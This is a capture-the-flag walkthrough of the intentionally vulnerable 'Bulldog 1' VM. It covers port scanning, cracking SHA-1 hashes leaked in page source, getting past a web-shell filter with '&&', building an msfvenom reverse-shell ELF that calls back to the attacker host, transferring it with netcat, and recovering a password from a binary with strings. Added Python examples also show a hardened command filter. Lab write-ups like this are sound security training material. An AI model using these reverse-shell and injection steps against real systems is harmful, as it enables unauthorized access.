Name: Bulldog 1
Date of Release: 28 Aug 2017
Author: Nick Frichette
Note: this VM does not work with VMware Workstation/Fusion, which is why, after a few tries, I decided to install VirtualBox (ew, disgusting).
First of all, we need to find the IP address of the VM; for that we can use
Now we can scan the target to find out which services are running inside the virtual machine.
For that, I use the well-known network scanner
[email protected]:~/Desktop# nmap -T5 -A -O --reason -p- 192.168.1.41

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-08 15:14 CEST
Warning: 192.168.1.41 giving up on port because retransmission cap hit (2).
Nmap scan report for pc-240.home (192.168.1.41)
Host is up, received arp-response (0.00061s latency).
Not shown: 65185 closed ports, 347 filtered ports
Reason: 65185 resets and 347 no-responses
PORT     STATE SERVICE REASON         VERSION
23/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|_  256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
80/tcp   open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    syn-ack ttl 64 WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms pc-240.home (192.168.1.41)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.84 seconds
[email protected]:~/Desktop#
Two interesting services are running: a Python HTTP server (WSGIServer, probably serving a Django web application) on ports 80 and 8080, and an SSH service (OpenSSH 7.2p2) on the non-standard port 23. Nmap labels 23/tcp as ssh only because version detection (-A implies -sV) read the OpenSSH banner; never trust the port number alone to tell you what a service is.
Now we will focus our research on the web site.
The index page of the web site does not give us any useful information, except the name of one employee.
I decided to actively enumerate the target with a tool used to brute-force URLs, called
The /admin/ and /dev/ directories sound interesting.
The admin directory is a login form, and after some research I did not find any vulnerability in it, so I moved on to the second directory.
In the index of the /dev/ directory we find an explanation of the project, a description of how the new team is structured, and a web shell, which is inconveniently usable only by logged-in users. At this point I knew I had to find credentials in order to log in to the admin panel and then use the web shell. After a few tries without success, I knew I had missed something. Yep, I had missed something called the source code.
The HTML source of the /dev/ index contains more than the rendered page shows: SHA-1 password hashes. Unsalted SHA-1 hashes of ordinary passwords are trivial to reverse, either through a public hash lookup service or offline with a wordlist attack.
I managed to recover the plaintext of two of the passwords:
We log in to the admin panel with one of these passwords, and we are then able to use the web shell.
Bypassing Command Restriction
At first look we can only use six commands: ifconfig, ls, echo, pwd, cat and rm. Moreover, we cannot use a semicolon.
We cannot use a semicolon, but maybe the && operator will work. And yes, it does: the filter only blocks the semicolon, so chaining an allowed command with && lets us execute any command we want on the target server.
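The following example is added here to illustrate the bypass above; it is not the VM's actual web-shell code. It models the restriction the writeup describes (first word must be one of the six commands, semicolons rejected) as a hypothetical naive_filter, shows that && sails through it because the string is handed to /bin/sh, and contrasts it with a version that tokenizes the input and executes the binary directly without a shell, so && becomes a harmless literal argument. The ALLOWED set and the function names are assumptions for the demo.

```python
import shlex
import subprocess

# Commands the web shell allows, as listed in the writeup.
ALLOWED = {"ifconfig", "ls", "echo", "pwd", "cat", "rm"}


def naive_filter(cmd: str) -> bool:
    """Hypothetical model of the restriction described above (not the VM's real code):
    the first word must be an allowed command and ';' is banned. Other shell
    separators ('&&', '||', '|', newline, '$(...)', backticks) are not checked."""
    words = cmd.split()
    return bool(words) and ";" not in cmd and words[0] in ALLOWED


def naive_run(cmd: str):
    """Vulnerable pattern: the filtered string is passed to /bin/sh, so every
    separator the filter forgot about is honoured by the shell. Returns stdout,
    or None if the filter rejected the input."""
    if not naive_filter(cmd):
        return None
    return subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout


def hardened_run(cmd: str):
    """Hardened version: split the input with shlex and exec the program directly,
    never through a shell. '&&' then reaches the program as a plain argument
    instead of being interpreted as a command separator."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None  # unbalanced quotes
    if not argv or argv[0] not in ALLOWED:
        return None
    # A real fix would also drop rm/cat or constrain their arguments: allow-listing
    # the binary does nothing against `cat /etc/shadow` or `rm -rf /`.
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(naive_filter("ls; id"))                       # False: semicolon caught
    print(naive_filter("ls && id"))                     # True: && not checked
    print(repr(naive_run("echo hi && echo pwned")))     # both commands ran
    print(repr(hardened_run("echo hi && echo pwned")))  # only echo ran, && was literal
```

The difference is entirely in whether a shell ever sees the string. Blacklisting separators is a losing game (&&, ||, |, newlines, $() and backticks all remain), whereas exec without a shell removes the separator problem in one move.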
We can remotely execute arbitrary commands; it is only a matter of seconds before we get a reverse shell.
We generate a malicious ELF file with msfvenom. The payload is 32-bit, which still runs on this 64-bit Ubuntu target because the kernel ships with 32-bit binary compatibility enabled:
[email protected]:~/Desktop# msfvenom --platform linux -p linux/x86/shell_reverse_tcp LPORT=1337 LHOST=192.168.1.107 -f elf -o rshell
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rshell
We send the malicious file to the target server: through the web shell, netcat listens on port 1337 and writes whatever arrives to /tmp/rshell, while on the attacker side we connect and push the file:
#Web shell
ls && nc -lp 1337 > /tmp/rshell

#Attacker
[email protected]:~/Desktop# nc -nvv 192.168.1.41 1337 < rshell
We make the file executable:
#Web shell
ls && chmod 777 /tmp/rshell
Finally, we start a listener on the attacker side, execute the reverse shell through the web shell, and then spawn a pseudo-TTY:
#Attacker
[email protected]:~/Desktop# nc -lnvvp 1337

#Web shell
ls && /tmp/rshell
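The transfer above has no integrity check: if the netcat connection is cut early, /tmp/rshell is silently truncated and the reverse shell simply never connects back. The example below is added here (it is not from the original writeup) and replays both sides of that transfer over loopback in Python, then does the check a practitioner should do on the real box before executing the file: compare the size and SHA-256 of what landed with what was sent. The payload bytes are a constructed stand-in for the 152-byte msfvenom ELF, and the port is chosen by the OS rather than fixed to 1337.

```python
import hashlib
import os
import socket
import tempfile
import threading


def _receive_into(srv: socket.socket, out_path: str) -> None:
    """Target side, the equivalent of `nc -lp 1337 > /tmp/rshell`: accept one
    connection and write everything received until the peer closes."""
    conn, _ = srv.accept()
    with conn, open(out_path, "wb") as f:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            f.write(chunk)
    srv.close()


def _send(port: int, data: bytes) -> None:
    """Attacker side, the equivalent of `nc -nvv HOST 1337 < rshell`: push the
    bytes, then half-close so the receiver sees EOF instead of hanging."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)


def transfer_and_verify(payload: bytes) -> dict:
    """Run both sides over loopback, then verify size and SHA-256 of the result,
    which is the step the writeup skips between the transfer and the chmod."""
    with tempfile.TemporaryDirectory() as d:
        out = os.path.join(d, "rshell")
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port for the demo
        srv.listen(1)
        port = srv.getsockname()[1]
        receiver = threading.Thread(target=_receive_into, args=(srv, out))
        receiver.start()
        _send(port, payload)
        receiver.join()
        with open(out, "rb") as f:
            received = f.read()
        os.chmod(out, 0o700)  # owner-executable is enough; 777 is not needed
        return {
            "bytes": len(received),
            "sha256_match": hashlib.sha256(received).hexdigest()
            == hashlib.sha256(payload).hexdigest(),
        }


# Constructed stand-in for the 152-byte ELF produced by msfvenom: ELF magic plus filler.
FAKE_RSHELL = b"\x7fELF" + os.urandom(148)

if __name__ == "__main__":
    print(transfer_and_verify(FAKE_RSHELL))  # {'bytes': 152, 'sha256_match': True}
```

On the real target the same check is one command on each side: sha256sum rshell on the attacker, and, through the web shell, an allowed command chained with && sha256sum /tmp/rshell. Only when the two digests agree is it worth running the binary.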
We have a low-privilege shell; now our job is to find a way to gain root access to this server. After a few minutes I found a hidden directory inside the bulldogadmin home folder:
[email protected]:/home$ cd bulldogadmin/.hiddenadmindirectory
In this directory there are two things: an ASCII text file and an x86-64 ELF binary:
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file customPermissionApp
customPermissionApp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c9f2333253302d74eff3da59653f82d28f9eb36f, not stripped
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ file note
note: ASCII text, with very long lines
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$
The first thing I tried with this ELF file was to search for any readable strings inside the compiled binary (the binary is not stripped, which makes this even easier), and fortunately for us, it contains a password:
The password is:
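As an added example of the technique used above (not part of the original writeup and not the real customPermissionApp), here is the core of what strings(1) does, written in Python, followed by the triage step that saves time on a large binary: pull out the strings that mention a credential-like keyword and the string stored right after each of them, since a prompt such as "enter password" is frequently followed in the data section by the value it is compared against. The SAMPLE_BINARY bytes and the secret in them are constructed for the demo.

```python
import string

# Printable ASCII as strings(1) counts it: letters, digits, punctuation and space.
PRINTABLE = set(string.printable.encode("ascii")) - set(b"\t\n\r\x0b\x0c")


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return every run of at least min_len printable bytes, like `strings -n 4`.
    A run is ended by any non-printable byte, including the NUL that terminates
    C string literals, so adjacent literals come out as separate entries."""
    found, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            found.append(run.decode("ascii"))
        run = bytearray()
    if len(run) >= min_len:  # flush a run that reaches end of file
        found.append(run.decode("ascii"))
    return found


def find_secret_candidates(data: bytes,
                           keywords=("pass", "pwd", "secret", "key", "token")) -> list:
    """Strings worth reading first: any that contain a credential-ish keyword,
    plus whatever string is stored immediately after each of them."""
    strs = extract_strings(data)
    hits = []
    for i, s in enumerate(strs):
        if any(k in s.lower() for k in keywords):
            if s not in hits:
                hits.append(s)
            if i + 1 < len(strs) and strs[i + 1] not in hits:
                hits.append(strs[i + 1])
    return hits


# Constructed stand-in for a small ELF's data section (not the real binary).
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9       # fake ELF magic; "ELF" is too short to report
    + b"/lib64/ld-linux-x86-64.so.2\x00"       # interpreter path, as seen in the file(1) output
    + b"\xde\xad\xbe\xef"
    + b"Enter the admin password:\x00"         # a prompt string
    + b"h4rdC0dedW0rd!\x00"                    # constructed secret stored right after the prompt
    + b"\x01\x02\x03"
    + b"sudo -u root su\x00"
    + b"ok\x00"                                # too short to report at the default length
)

if __name__ == "__main__":
    for s in extract_strings(SAMPLE_BINARY):
        print(s)
    print(find_secret_candidates(SAMPLE_BINARY))
```

On a real target, run strings -n 4 on the binary and grep the output for the same keywords; when the binary is not stripped, as here, also check the symbol names, because a function called something like checkPassword points you straight at the literal it compares against.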